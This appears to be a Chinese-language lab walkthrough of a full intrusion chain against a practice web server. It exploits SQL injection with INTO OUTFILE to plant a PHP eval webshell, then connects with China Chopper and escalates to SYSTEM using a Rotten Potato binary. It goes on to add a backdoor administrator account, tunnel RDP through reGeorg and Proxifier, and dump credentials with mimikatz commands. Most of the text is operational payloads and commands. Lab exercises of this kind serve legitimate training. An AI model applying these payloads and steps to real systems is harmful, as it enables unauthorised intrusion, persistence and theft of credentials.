先输入?id=1和?id=2
如果id=1能回显 id=2不能回显,id=2-1能回显,说明有sql注入
sql注入其实可以写webshell的
into outfile 导出文件
into dumpfile 导出文件
将查询的结果导出成文件
http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,2 into outfile ‘C:/phpStudy/WWW/123456.txt’
菜刀,蚁剑=>一句话木马直接相连(默认流量没有加密)
冰蝎,哥斯拉=>流量有加密,只能上传他自己的木马
这里在sql注入点注入一句话木马
http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile ‘C:/phpStudy/WWW/4448.php’
这里将直接用菜刀连接,连接密码为8,连接后打开虚拟终端,这里先看一下权限whoami
当我们遇到不是管理员权限的时候我们肯定需要提权
1.利用目标主机上的服务提权(目标主机运行的xxx软件,但是这个软件有漏洞可以利用)
2.利用web服务(一台机器上可能有多个网站,多个web容器)
3.利用windows漏洞systeminfo找补丁,找没有打的补丁
在虚拟终端中输入systeminfo来查看系统信息
这个是一个windows提权辅助工具https://i.hacking8.com/tiquan/
将systeminfo查到的已打的补丁,查询得到没有打的补丁。然后根据靶机的型号来在github上找到这个cve的漏洞进行操作。
这里有一个提权神器。烂土豆。这里可以通过烂土豆来提权
将烂土豆的exe文件,拖入到目录中改名(因为这里的原来的文件名太长了)。在虚拟终端中打开1111.exe(这里改成了1111.exe)。
直接输入1111.exe -p "whoami"来进行提权。
这里已经成了系统权限。
这里通过烂土豆来用系统命令来进行生成一个新的用户
这里可以在网上搜索windows cmd修改管理员权限
net localgroup administrators 用户名 /add
这里1111.exe -p “net localgroup administrators xhy /add”
这里已经提权了
远程桌面只有管理员可以连接
netstat -ano来查看端口
cmd命令mstrc远程桌面连接
你在这里将创建的管理员账号输入,发现登不上。这里是什么原因呢。刚刚咱们找到的那台机器是windows2008,现在是2003这是为什么呢
这就像域名的核心是ip,一个ip底下可能有多台服务器,这些服务器就共用了一个ip,这个的核心是端口映射,这里解释一下什么是端口映射,相当于是有3个主机ABC连在了一个路由器上,这里说网关吧,假如A主机开的3389端口,而B主机不开的3389端口,这样从外网你用3389访问,网关就会让你访问A主机,是永远不可能访问到B主机的。
这里使用了php作为了中间的媒介(PHP可以帮助我们发起请求)
这里使用正向连接:请求=>php=>发送出去 这里的php就相当于一个间谍
将后缀为php的reGeorg这个tunnel.nosocket.php放到菜刀的目录中,也就是网站的目录中。
改个好写的名字访问一下
出现这种样子说明就ok了
在这个目录下cmd一下,这里运行python环境,这里我的是py2,这个只有py2能运行,py3就不行了,这个reGrorg是基于py2的。这里输入python reGeorgSocksProxy.py
然后这里会有一些指令,python reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/2222.php -p 5242(-u后加那个文件的位置,-p后加端口映射的端口)
等这个运行开以后还得用一个全局流量代理将3389远程桌面连接的请求发到5242端口
这里的全局代理用的是Proxifier。
点开配置文件的代理服务器,地址设置为本地127.0.0.1 端口为5242 协议为socks5。然后检查。
接下来这里添加一个规则,名称就写mstsc,应用程序是mstsc.exe,这里的动作用代理也就是proxy SOCKS5 127.0.0.1另一个direct的意思是不拦截。
点击确定。
在菜刀的虚拟终端中,ipconfig一下,发现主机是10.0.1.4
mstsc远程连接一下,这里用自己添加的管理员账户xhy 和 A1B2C3!.Qa登录
登录后用管理员权限打开2.exe
log生成日志
提升权限privilege :: debug
抓取密码sekurlsa :: logonpasswords